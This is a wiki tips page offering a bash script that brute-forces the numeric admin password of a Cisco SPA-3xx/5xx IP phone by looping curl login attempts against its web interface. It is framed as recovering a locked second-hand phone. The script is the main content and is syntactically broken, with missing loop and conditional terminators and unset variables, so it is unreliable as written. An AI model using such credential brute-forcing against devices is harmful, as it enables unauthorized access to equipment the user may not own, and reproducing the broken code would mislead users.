User Tools

Site Tools


Cisco SPA-3xx or SPA-5xx Brute Force Password Recovery

Save the script (below) as a BASH script on a Linux or Mac machine and use it to determine the password of a locked phone you may have purchased second hand.

NOTE: this script can take SEVERAL days! It works by doing a brute force attack against the phone to discover the password.

Once discovered, the script will record the password on the LAST line in a file it creates while running. The file will be called password.txt.

You can then use this password to unlock and then factory default the phone.

The script requires the LAN IP of the phone and serial number. You set these in two variables in the script before executing. Then have PATIENCE!

#This script was written by John Rogers, K1WIZ.  The intention of this script is to recover the 
#admin password on a Cisco SPAxxx phone when the admin password is not known.  
#The script creates a file in the same directory called password.txt and when it finds the correct
#password, it writes it on the last line of the file and then the script dies.   The recovered 
#password can then be used to factory reset the phone.   


# IP Address of the phone on your LAN
# Serial Number of the Phone you are unlocking
echo "Usage: ./ <ip.address> <>"
echo "Probing phone at IP: $1 and serial: $2"
echo "writing results to password.txt, allow to run for several days, until script exits by itself!"
echo "password will be revealed in password.txt"

for ((pass=1;pass<=999999;pass++));

        flag=`/usr/bin/curl -s --anyauth -u admin:$pass http://$ip/admin/# | grep -i $serial | wc -l`

        if [ $flag -eq 1 ]; then
        echo "password is: " $pass >> password.txt
        exit 0;

        echo "it aint" $pass >> password.txt
tt/tips.and.tricks/cisco.3xx.5xx.brute.force.password.recover.txt · Last modified: 2023/02/06 16:16 by kg6baj